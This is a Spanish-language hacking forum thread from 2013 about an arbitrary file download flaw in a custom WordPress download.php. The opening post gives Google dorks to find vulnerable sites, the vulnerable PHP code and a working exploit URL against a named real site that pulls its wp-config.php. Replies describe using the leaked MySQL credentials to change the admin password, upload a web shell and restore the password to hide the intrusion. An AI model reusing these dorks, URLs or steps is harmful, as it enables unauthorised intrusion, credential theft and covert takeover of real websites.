send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Vulnerabilidad en wordpress

  • 9 Respuestas
  • 4453 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado DLV

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: dlv.team
« en: Febrero 08, 2013, 11:47:30 am »
No juzgen el titulo no sabia que poner   ::)
- Hoy les traigo una vulnerabilidad de wordpress que ayer me encontre jugando con google y sus dork
en que consiste en descargar la configuracion osea  "wp-config.php" Hacer cualquier cosa malote de esas y waaaa... xD

Dork:
inurl:download.php?download_file= & inurl:wp-content

inurl:download.php?&path= & inurl:wp-content

Algunos sitios de wordpress le agregaron "download.php?download_file="

codigo de download.php:
Código: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
<?
$download_file = $_GET['download_file'];
$split_file = explode('/',$download_file);
$split_file_num = count($split_file);
$my_section = $split_file_num-1;
$download_file_name = $split_file[$my_section];
header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$download_file_name.";");
header('Content-type: application/pdf');
header("Content-Length: ".filesize($download_file));
readfile($download_file);
exit;
?>

Entonces me pregunte por algna paginas cuando sale descargar archivo Sale esto "/var/www/vhosts/pagina.com/subdominio/Wordpress/"
tenemos dos opciones para explotar esto podrucir un error en path o solo colocando wp-config.php ... se descarga inmediato

un ejemplo es:


navisworld.navis.com/wp-content/themes/navisworld/download.php?file=/var/www/vhosts/navis.com/navisworld/wp-config.php

Bueno solo eso si quieren cambienle el titulo no se como eso asi que eso :3 Chau la pagina fue avisada de la vulnerabilidad ... :D


Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Febrero 09, 2013, 10:50:57 pm »
Sonara tonto, pero podrias decirme algun ejemplo de lo que podrias hacer descargandote ese archivo de configuracion?

Desconectado elrodrix

  • *
  • Underc0der
  • Mensajes: 14
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Febrero 09, 2013, 11:34:49 pm »
A mi tambien me interesaria saber que se puede hacer con esta vulnerabilidad

Desconectado ReecGlobal

  • *
  • Underc0der
  • Mensajes: 16
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: reecglobal
« Respuesta #3 en: Febrero 09, 2013, 11:47:45 pm »
eres un puto amo men  :D

Conectado ~ Yoya ~

  • *
  • Underc0der
  • Mensajes: 150
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #4 en: Febrero 10, 2013, 01:52:37 am »
el archivo wp-config.php contiene los datos de la conexion mysql.

Con esos datos puedes conectarte remotamente al servidor mysql, cambiar la pass del admin y loguearte como administrador y luego subir shell. Luego restablece la pass antigua del admin, asi no se dara cuenta de que haya sucedido algo raro. Siempre y cuando el servidor mysql permita conexiones remota.

Saludos.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Desconectado duff10

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Febrero 10, 2013, 02:09:58 am »
Muy buena.. en pocas palabras es un arbritary download en wordpress

Desconectado fortil

  • *
  • Underc0der
  • Mensajes: 175
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #6 en: Agosto 16, 2013, 07:38:38 pm »
yo tengo una pregunta (bueno varias)

me imagino la potencialidad de esto, pero no veo ¿Cómo usarlo?

me pueden ayudar?

Desconectado M5f3r0

  • *
  • Underc0der
  • Mensajes: 44
  • Actividad:
    0%
  • Reputación 0
  • Leer la firma.
    • Ver Perfil
  • Skype: m5f3r0
« Respuesta #7 en: Agosto 16, 2013, 07:43:44 pm »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
yo tengo una pregunta (bueno varias)

me imagino la potencialidad de esto, pero no veo ¿Cómo usarlo?

me pueden ayudar?

Lamento revivir el tema, (aunque ya lo hayan hecho), te explico lo que puedes hacer con estos datos.

el contenido del archivo "wp-config.php" son los datos de la conexión al MySQL del servidor, el nivel de peligrosidad llegaría siendo grave, si tienes alguna distribución de linux con MySQL, lo ejecutas y tecleas los siguientes comandos:

mysql -h localhost -u userMySQL@localhost -p (contraseña).

Saludos y espero te haya sido de ayuda ;).
A veces, observo mi pasado y me arrepiento en la actualidad de todo lo que llegue a perder y olvidar por como me veía la sociedad, nunca dejes que las opiniones de los demás te lleguen a afectar moralmente hasta el punto en que dejes de hacer lo que más te apasiona, saludos! (msj escrito en el 2016)

Desconectado fortil

  • *
  • Underc0der
  • Mensajes: 175
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #8 en: Agosto 18, 2013, 11:40:35 am »
Si eso lo sé, sé que implica tener un wp-config.php de una web en WordPress, solo que no entiendo qué es un Dork y en donde se pone la dirección para encontrar el wp-config.php

Si me pueden dar una orientación para saber dónde empezar?

gracias

Desconectado DLV

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: dlv.team
« Respuesta #9 en: Agosto 20, 2013, 12:10:51 pm »
Empiesa buscando dork en google xD

 

¿Te gustó el post? COMPARTILO!



Ataque de diccionario cracking CMS Wordpress/Joomla Backtrack5r2 (Hacking/Deface

Iniciado por andrewtwo

Respuestas: 0
Vistas: 1708
Último mensaje Septiembre 02, 2012, 02:12:40 am
por andrewtwo
WordPress Wordfence Firewall 5.1.2 Cross Site Scripting Vulnerability

Iniciado por Mayk0

Respuestas: 0
Vistas: 1691
Último mensaje Noviembre 07, 2014, 01:55:54 pm
por Mayk0
Vulnerabilidad en Kali Linux Sana 2.0 CVE-2015-2008 Auditoria Omar Rodriguez

Iniciado por DaRK UnLiMiTeD

Respuestas: 0
Vistas: 2440
Último mensaje Septiembre 28, 2015, 10:37:40 pm
por DaRK UnLiMiTeD
Los 3 modos más comunes de hackear WordPress y cómo evitarlo

Iniciado por Hackmundy

Respuestas: 2
Vistas: 5872
Último mensaje Marzo 06, 2013, 01:15:42 am
por b166er
Flunym0us 2.0 - Escáner de vulnerabilidades para WordPress y Moodle

Iniciado por Pr0ph3t

Respuestas: 2
Vistas: 2272
Último mensaje Octubre 10, 2012, 12:57:40 pm
por Pr0ph3t